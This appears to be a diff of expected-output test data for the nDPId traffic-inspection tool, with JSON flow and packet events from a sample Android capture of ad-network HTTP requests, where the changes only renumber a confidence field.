CbF3Tzgm5e0M0LunlBN\/8+oJu\/A9z8u0vQrpCfFX85I7tCnPBbGSm\/lk30zbTs9WqNEysUXZM4hpMYDijwEhBJBF+uEHC\/esnKvn9esrJfsrJfsrJfsrJfsrK\/dtYvWdkvWdn\/qKzsr2DFb8iy\/jbI+v87\/boZGvre\/q+mYD9X+y2Z2M+J2D+hfcm9nhP5\/pG515+TmJ\/6\/\/ct9fpHOdZMY39Dhb8G6D\/nW\/8jnNtLgvVLgvV\/PAnWP1o8\/7C\/j\/GrCdn3b9X++rjgVxOy5zr\/lhOyP3X5907ILoBTEbN4znv+kQ+d\/VichUew\/T3fvn\/\/\/udb4HMLzxvoT2hNXDD+vDu9qpsx8R\/BjlUk9vhhnsjPvM9fbh60mXtP2067WZA3b3\/43ScSuJ+\/Jh1o\/589f\/f5q7983TbBO\/IvX383f1X7D26e5NWHfwLD8Hfzt4KHVQ4c8Yd\/EgTBd\/P3kwdgm3k3fgA95Uny3bved25AP7N3flfHk\/\/O9q5t3XxAYPiffvcurb\/95OP9S+H\/7Ie8bRKwU3yAf7mheXxfntrFuygOo2R+sfDuSdIqdOw38MP939t7ww\/zd6D\/EIBt6F1gp3ECpLWz+l3tV3HwcX72AGbrwUsevObB8x7a5CFPHpL4IUIeIvQhWj5E2EOEP0Srh6LyH9zc8x+CvEofgthPPDBjD4kfAgt5iLOibR5mie3Ktx+KByfJ3VvZ5o3\/0EQPjfcQVQ9Pm9mDXTWxm\/gPdh2D5jwf7JBJDVoMXbuY9TLfttXcEahdPcxoZb7Ms188AHtsHzK7e6j9uxJ\/SO0qjDMwbYXtzab0Af74JEztJ4Dls0xPkzBP59O0NzPI+eFpHczTl9hF7X\/4dPPd8wNgk+5To59HDLbN52qAajtO9WADA8jG9DP1u3tXwLZiO5u1VqV28tHzkx\/uGvXAsqruh4EfZoW\/ayIwsDD6CMSv\/Lp++DQLbtw8z7gXZA9+Os8jaPN5HLPhPzf91F3vz4bwAYfhj0CFbfLDvEY\/82X+x0\/tNtGTHDawHCCCHzQfv9L2zybrqx7KD44P7MB\/KD\/YAVDSD89\/3+DDn\/7px7p1Huq2+FETBP5Pv7sPNXpqAegqr+P7DFR+Ys8I8zuwnIBV2MmzWDMImat8nFtq8uLDu\/e4n85t\/\/D0Qg0Q0Jlif4jmpfjV1IKF6lf3FuKsfrC\/en6fktcP8aOXuy0wqua9C4yk8dnEn0tvXt9n7vXb7+LgzWeW0G+en9f0eLRD2U79N3c4\/frtX8B\/9d4uCrAYmChOvDfx24f4\/b0RPfL95u2PC++fMbb313\/95id0t67nt6yPzdvv\/KT2XzXV+EP8\/v4HGua3lI8N0GLjRm\/8t5\/IT+wfP755+\/DZr8UP4Plnxzf7vNnP+Y\/VPAB69mHApJlkPuHSwBJ58\/Z9H3tN9B2Owd\/7UP0nf\/LGfwT3f1a\/\/e7JQfoQAn9XPQn6ftarDtT62CxeF8Prh\/R95aeP8f3\/5uNcASxxUP40aw\/Vo\/258Dx9Dzmgla1fjfp9lebVmz9NgSP4iwzM6OPrLvb7+57zV3\/69iH5VdYg8YcYTOWdtX6EHzzwkz4CMZ8fgCn+Unj84eNdo\/nTlLiP+TwlVNNUMXBOQJfPdvz67fv0PtFQDDaN2E7+8l0NjNN\/fPMXf+n95fu\/WryF3n7ngomatziwc3BgH2veuH+B\/NUsxJ0kAiNCIO\/t2493TYJOk6dOo8fklzqdRYueuIrH6CsRvKL6sQAPwRee1B7itE2\/4vmuAEI+S\/QkZHEX8idyAznrt++bnIsH33uDvn0Lmv55teC3VPv4EQzgd8CAfuc9jaJ9BPYNvHUc2kBx8\/owQWgFrPKT3HbmVXnsQeF9ufwaZ3z\/Qy4z49sHZzYvv4tdXwF9J9q8pL\/zHhEIyNz+
+fL7RweI\/7v6r\/8a3NZv\/3z5Af1CQu8k9APyAXk7iwvM+ifKuAdqYBZfP9RvH36XvwUsb2Zr\/Zl7mE3w9du3P6s82+Trhy\/2+\/Yh\/xnHJ10\/vH5W67NhvV54i9cPr571+DMiYP2K2Nbz9gQosyN5zHLQV\/U+iKv60xq7u6G336D9xE3lT57mrq3w62ECdADMMvxZlQf7fV+B7elN+MU3gcl8D7YwtgP1JLD1+ID+BqDJeQd4\/cU3vf0BbP12dYxTHyCeN9nbh+wRzNCncvOwhAF0efgdMtvD1+3NgLKO8v5HLQJf578vZmMBTB7Q8m\/o4LkHoI20SPzGf\/34CMYOhu6N+hxf\/7n9fgZHP\/d4CPpn9d3pfbC\/IdvmsJ\/fwcw0gGp97yej\/jsafJIHuGLgTuclHN\/\/r+\/ONQCTGGmz"} -00937{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2408,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1654385184982,"flow_last_seen":1654385185015,"flow_idle_time":7580000,"flow_min_l4_payload_len":262,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":1515,"midstream":1,"thread_ts_msec":1654385185015,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36660,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"hybird.rayjump.com","url":"hybird.rayjump.com\/rv\/endv4.html?mof=1&ec_id=4&mof_uid=91199&n_imp=1&unit_id=8881&sdk_version=mal_8.7.4","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001)"}} -01176{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2427,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1654385184944,"flow_last_seen":1654385185026,"flow_idle_time":7580000,"flow_min_l4_payload_len":497,"flow_max_l4_payload_len":5712,"flow_tot_l4_payload_len":109025,"flow_avg_l4_payload_len":3407,"midstream":1,"thread_ts_msec":1654385185026,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36640,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"hybird.rayjump.com","url":"hybird.rayjump.com\/rv-zip-2022\/0428\/endcard-dsp-1302-f2714a34f6661a70fedea1667fb7a9e4.zip?md5filename=f2714a34f6661a70fedea1667fb7a9e4&foldername=endcard-dsp-1302&mof=1&mof_uid=91199&n_imp=1&mof_pkg=com.sceneway.kankan&n_region=fk&alecfc=1&bait_click=1&mof_textmod=1&bp_test=2&wglbp=1&cta_type=1&mof_use_get=1&dlst=0&mof_use_get=1&plmug=1","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001)"}} +00937{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2408,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1654385184982,"flow_last_seen":1654385185015,"flow_idle_time":7580000,"flow_min_l4_payload_len":262,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":1515,"midstream":1,"thread_ts_msec":1654385185015,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36660,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"hybird.rayjump.com","url":"hybird.rayjump.com\/rv\/endv4.html?mof=1&ec_id=4&mof_uid=91199&n_imp=1&unit_id=8881&sdk_version=mal_8.7.4","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001)"}} 
00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2503,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":2,"flow_last_seen":1654385185166,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":236,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":236,"pkt_l4_len":202,"thread_ts_msec":1654385185166,"pkt":"nLbQ0+MztKXvZygQCABFAADe9z5AACoGBubKmcQ1wKgCfgBQ5Ybmg6trug1byIAYAPOTtwAAAQEICkyTXI+9cmjoSFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IEFwYWNoZS1Db3lvdGUvMS4xDQpWcGFkbi1TdGF0dXMtQ29kZTogLTI2DQpWcGFkbi1TdGF0dXM6IE5PX0ZJTEwNClZwYWRuLVN0YXR1cy1EZXNjOiANCkNvbnRlbnQtTGVuZ3RoOiAwDQpEYXRlOiBTYXQsIDA0IEp1biAyMDIyIDIzOjI2OjI0IEdNVA0KDQo="} 00699{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2504,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":2,"flow_last_seen":1654385185942,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":236,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":236,"pkt_l4_len":202,"thread_ts_msec":1654385185942,"pkt":"nLbQ0+MztKXvZygQCABFAADeE\/tAACoG6inKmcQ1wKgCfgBQ5Yg8Z0+pmkmYKYAYAPN5zQAAAQEICkyTX6y9cmj1SFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IEFwYWNoZS1Db3lvdGUvMS4xDQpWcGFkbi1TdGF0dXMtQ29kZTogLTI2DQpWcGFkbi1TdGF0dXM6IE5PX0ZJTEwNClZwYWRuLVN0YXR1cy1EZXNjOiANCkNvbnRlbnQtTGVuZ3RoOiAwDQpEYXRlOiBTYXQsIDA0IEp1biAyMDIyIDIzOjI2OjI0IEdNVA0KDQo="} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2505,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385229374,"flow_last_seen":1654385229374,"flow_idle_time":7580000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1654385229374,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"52.29.177.177","src_port":37100,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 02393{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2505,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":1,"flow_last_seen":1654385229374,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1654385229374,"pkt":"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"} -00668{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2505,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385229374,"flow_last_seen":1654385229374,"flow_idle_time":7580000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1654385229374,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"52.29.177.177","src_port":37100,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {}} 
+00668{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2505,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385229374,"flow_last_seen":1654385229374,"flow_idle_time":7580000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1654385229374,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"52.29.177.177","src_port":37100,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {}} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2506,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":2,"flow_last_seen":1654385229374,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1654385229374,"pkt":"tKXvZygQnLbQ0+MzCABFAABIbklAAEAGI3LAqAJ+NB2xsZDsAFBe8KOySC8RAoAYAfapLwAAAQEICgB7lmPzZF3LaGliaWQ9MCZvZm49MjUzNjQwJnI="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2507,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385229375,"flow_last_seen":1654385229375,"flow_idle_time":7580000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1654385229375,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"35.156.44.13","src_port":42554,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
02154{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2507,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":1,"flow_last_seen":1654385229375,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1326,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1326,"pkt_l4_len":1292,"thread_ts_msec":1654385229375,"pkt":"tKXvZygQnLbQ0+MzCABFAAUg7FZAAEAGNrLAqAJ+I5wsDaY6AFDzNa5LO3\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"} -01929{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2507,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385229375,"flow_last_seen":1654385229375,"flow_idle_time":7580000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1654385229375,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"35.156.44.13","src_port":42554,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": 
{"hostname":"de01.rayjump.com","url":"de01.rayjump.com\/onlyImpression?k=629bea20a4e5410001f01c7x&mp=fURPDr5tiUStf7V2fajMiaveHUveDAJ96aiPfU5IiARTfnHIGal9i%2BMefbMM6jxc6aRAGaxIi%2BMPfdMei%2BewDke6Go9bWUxIi099WUR%2Fi%2BegYFKgY75IhFx8%2BFJML7K%2FH5K9GaHIinhPfdleialM6azIHkPIG%2BeIGnR%2FiUjPWUNMWURAf%2BeIiB9eiUj%2FiURTWUhA6deIDUQQiUlbfADAfnx3iUVPH%2BM2DkiFDnSrH0T9Haj9WnNbDriwDn3Mi0TBGajBDFDMDAR2ik5I6ajMigMBidMe6aSIinh1GUcI67KMHkPth7QI67cbhFH8LAtA6aSI4BzULoR1invMiajsRrxAh7Q3RUEFfZM0DFQ3RUE0inNAGaN2R0M0DkxwRUuYRrc1D%2BzsL%2BHQWrfXYZzJWoz0HoR1RrfXYZPt4rcBY7QFHZPtYrxBYFQ3R0M0hdzuDF56Lk90GUiBGZ9FGnRAWozMhrQUH5KXJ%2BN0GUiBGZ9FGnRAWozuh2KED0R1ioM0hdzuDF56hrcbRUEAiU3%2FfU3BiBM0J7c9RUEeWozrDkwQRUEeWoztJkfTLkK%2FRUEeWoztHQKTD%2Bl0GUiBGZ9FGnRAWozMhrQUH5KBH0R1iARPWUDPiUisRgSBLkfQ%2BbzrJoR1iARPWUDPiUisRgSBLkfQ%2BbzrJ7j0GUiBGZ9FGnRAWozrhdzuDFV0GUi%2FiU3FGnRAWoztJdQMHZR1iZM0L7D0GUvsRgfQD2KMhrQUHZR1iUVMWozUJ%2BzBHkPU4ZR1RQ5nxoRsRgzTDkh0Ggs0J7HsYbh0G0zrfZRsRgxEHk2uhBR1RrKTL75BhBzKWozADgxtHBR1R3RwHdfMW5xZRg2IideI6deI6dMb6aRbinRe6aSI6ds0Yr5THBR1R0zK6av%3D","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +01929{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2507,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385229375,"flow_last_seen":1654385229375,"flow_idle_time":7580000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1654385229375,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"35.156.44.13","src_port":42554,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": 
{"hostname":"de01.rayjump.com","url":"de01.rayjump.com\/onlyImpression?k=629bea20a4e5410001f01c7x&mp=fURPDr5tiUStf7V2fajMiaveHUveDAJ96aiPfU5IiARTfnHIGal9i%2BMefbMM6jxc6aRAGaxIi%2BMPfdMei%2BewDke6Go9bWUxIi099WUR%2Fi%2BegYFKgY75IhFx8%2BFJML7K%2FH5K9GaHIinhPfdleialM6azIHkPIG%2BeIGnR%2FiUjPWUNMWURAf%2BeIiB9eiUj%2FiURTWUhA6deIDUQQiUlbfADAfnx3iUVPH%2BM2DkiFDnSrH0T9Haj9WnNbDriwDn3Mi0TBGajBDFDMDAR2ik5I6ajMigMBidMe6aSIinh1GUcI67KMHkPth7QI67cbhFH8LAtA6aSI4BzULoR1invMiajsRrxAh7Q3RUEFfZM0DFQ3RUE0inNAGaN2R0M0DkxwRUuYRrc1D%2BzsL%2BHQWrfXYZzJWoz0HoR1RrfXYZPt4rcBY7QFHZPtYrxBYFQ3R0M0hdzuDF56Lk90GUiBGZ9FGnRAWozMhrQUH5KXJ%2BN0GUiBGZ9FGnRAWozuh2KED0R1ioM0hdzuDF56hrcbRUEAiU3%2FfU3BiBM0J7c9RUEeWozrDkwQRUEeWoztJkfTLkK%2FRUEeWoztHQKTD%2Bl0GUiBGZ9FGnRAWozMhrQUH5KBH0R1iARPWUDPiUisRgSBLkfQ%2BbzrJoR1iARPWUDPiUisRgSBLkfQ%2BbzrJ7j0GUiBGZ9FGnRAWozrhdzuDFV0GUi%2FiU3FGnRAWoztJdQMHZR1iZM0L7D0GUvsRgfQD2KMhrQUHZR1iUVMWozUJ%2BzBHkPU4ZR1RQ5nxoRsRgzTDkh0Ggs0J7HsYbh0G0zrfZRsRgxEHk2uhBR1RrKTL75BhBzKWozADgxtHBR1R3RwHdfMW5xZRg2IideI6deI6dMb6aRbinRe6aSI6ds0Yr5THBR1R0zK6av%3D","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 
01115{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2508,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":3,"flow_last_seen":1654385229376,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":548,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":548,"pkt_l4_len":514,"thread_ts_msec":1654385229376,"pkt":"tKXvZygQnLbQ0+MzCABFAAIWbkpAAEAGIaPAqAJ+NB2xsZDsAFBe8KPGSC8RAoAYAfaq\/QAAAQEICgB7lmTzZF3LZXFkc3BzPTUyJTJDNzElMkM1NyUyQzY2JTJDNjMlMkM0NSUyQzU4JTJDMiUyQzY4JTJDNTUlMkM3MCUyQzI4JTJDNDYlMkM2OSUyQzYyJTJDNjUlMkM1MSUyQzYxJTJDNDMlMkM1OSUyQzE1JTJDOSUyQzcyJTJDNTMlMkM2NyZyZmVjcG09MCZyZXNwdD0xJnNpcD0xNzIuMzEuMS4yMzImb3J0ZD0yJmJkbj1jb20uc2NlbmV3YXkua2Fua2FuLm1hcmtldDMma2V5PXBsYXkmcmF0ZT0wIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgMTE7IHNka19ncGhvbmVfeDg2IEJ1aWxkL1JTUjEuMjAxMDEzLjAwMTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS84My4wLjQxMDMuMTA2IE1vYmlsZSBTYWZhcmkvNTM3LjM2DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCkhvc3Q6IGFkeC10ay5yYXlqdW1wLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2509,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385229377,"flow_last_seen":1654385229377,"flow_idle_time":7580000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1654385229377,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"35.156.44.13","src_port":42566,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
02393{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2509,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":1,"flow_last_seen":1654385229377,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1654385229377,"pkt":"tKXvZygQnLbQ0+MzCABFAAXUXuxAAEAGw2jAqAJ+I5wsDaZGAFB7fWmugsWKk4AQAfYYlgAAAQEIChlnEfsPV8RHR0VUIC9pbXByZXNzaW9uP2s9NjI5YmVhMjBhNGU1NDEwMDAxZjAxYzd4Jm1wPWZVUlBEcjV0aVVTdGY3VjJmYWpNaWF2ZUhVdmVEQUo5NmFpUGZVNUlpQVJUZm5ISUdhbDlpJTJCTWVmYk1lZkFFZUduM1RmYWlGZm5SUEduRWU2anhjNmFSQUdheElpJTJCTVBmZE1laSUyQmV3RGtlNkdvOWJXVXhJaTA5OVdVUiUyRmklMkJlZ1lGS2dZNzVJaEZ4OCUyQkZKTUw3SyUyRkg1SzlHYUhJaW5oUGZkbGVpYWxNNmF6SUhrUElHJTJCZUlHblIlMkZpVWpQV1VOTVdVUkFmJTJCZUlpQjllaVVqJTJGaVVSVFdVaEE2ZGVJRFVRUWlVbGJmQURBZm54M2lVVlBIJTJCTTJEa2lGRG5TckgwVDlIYWo5V25OYkRyaXdEbjNNaTBUQkdhakJERkRNREFSMmlrNUk2YWpNaWdNQmlkTWU2YVNJaW5oMUdVZkk2N0tNSGtQdGg3UUk2N2NiaEZIOExBdEE2ZHMwSjc1d2hqUTNSVXVPUlUzTWZvUjFpJTJCMks2ZHMwREZsMEdVak1pYXZlV296M2hiU3VIb1IxZlVWc1JyZnVIb1IxUlVqVGlBbFRmWlJzUnJjM1laUjFrQnp0NHJjQlk3UUZIWlBVWUZUMCUyQlpNMERyTjBHMHpVWUZUJTJGRCUyQnV0aHJldUpyViUyRkRrUDNockt1SG9Sc1JnU0JMa2ZRJTJCRlElMkZSVUVBaVUzJTJGZlUzQmlCTTBoZHp1REY1NlliNVRSVUVBaVUzJTJGZlUzQmlCTTBMJTJCZjZMN1IwR1V2c1JnU0JMa2ZRJTJCYnp0SkJSMWlBUlBXVURQaVVpc1JneHQ0b1IxaVpNMEhyYzhIWlIxaVpNMEQlMkI1VUo3UVhZMFIxaVpNMERrSDZKN2M5UlVFQWlVMyUyRmZVM0JpQk0waGR6dURGNTZockQwR1VpQkdaOUZHblJBV296TWhyUVVINUtCSGdOMEdVaUJHWjlGR25SQVdvek1oclFVSDVLQkhneHRSVUVBaVUzJTJGZlUzQmlCTTBIZ1NCTGtmUVJVRUFXVVJQZlUzQmlCTTBEJTJCeFBoN1YwR1Vqc1JydHJSVUVNV296QUhrZjZoZHp1REZWMEdVUjJpb00wRGI1QmhyNSUyRkRiMzBHMHo1VlROMFdvekJKN2NnUlV1T1JneHJZN0tiUlVFMEhVVjBXb3pUTDc1d0wlMkJpMEcwelhKN3RRaGdpMDZaTTBoRnpURGtoMEcwem9Xa3hBaG8yVlYweks2YVNJNmRlSTZkZU9ScjVVSGROMEdVakFpYVJzUnJ4QWhjS1VoclEzUlVFZWZhUkZHbmxNaWEzOVdvelRERnhUUlVFMDQyTTBZJTJCSDZMZFEwTCUyQnozJTJCRnglMkZoMk0wR1VScyUyQm96TVlqeCUyRmgyTTBHVWNLUjBNMEo3d1VZMFIxaW9NM
EpyUTMlMkJGSFVSVUVlV296dEhkZk1Ea2ZRJTJCYnhQaDdWMEdVdnNScjJ0Sjc1QkxrY3MlMkJieFBoN1YwR1V2c1JyUUYlMkJieE1ZY0tUUlVFTVdvelRoN3hUSm9SMWlvTTBERnglMkYlMkJieDNEa3pUUlVFMERuajA2JTJCTWI2YVJiaW5SZTZhU0k2ZHMwWXI1VEhCUjFSMHpLNmFSJTNEIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgMTE7IHNka19ncGhvbmVfeDg2IEJ1aWxkL1JTUjEuMjAxMDEzLjAwMTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vj"} -00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2509,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385229377,"flow_last_seen":1654385229377,"flow_idle_time":7580000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1654385229377,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"35.156.44.13","src_port":42566,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {}} +00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2509,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385229377,"flow_last_seen":1654385229377,"flow_idle_time":7580000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1654385229377,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"35.156.44.13","src_port":42566,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {}} 
00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2510,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":2,"flow_last_seen":1654385229377,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1654385229377,"pkt":"tKXvZygQnLbQ0+MzCABFAABIXu1AAEAGyPPAqAJ+I5wsDaZGAFB7fW9OgsWKk4AYAfYTCgAAAQEIChlnEfsPV8RHa28pIFZlcnNpb24vNC4wIENocm8="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2511,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385229378,"flow_last_seen":1654385229378,"flow_idle_time":7580000,"flow_min_l4_payload_len":1249,"flow_max_l4_payload_len":1249,"flow_tot_l4_payload_len":1249,"flow_avg_l4_payload_len":1249,"midstream":1,"thread_ts_msec":1654385229378,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.50","src_port":41940,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 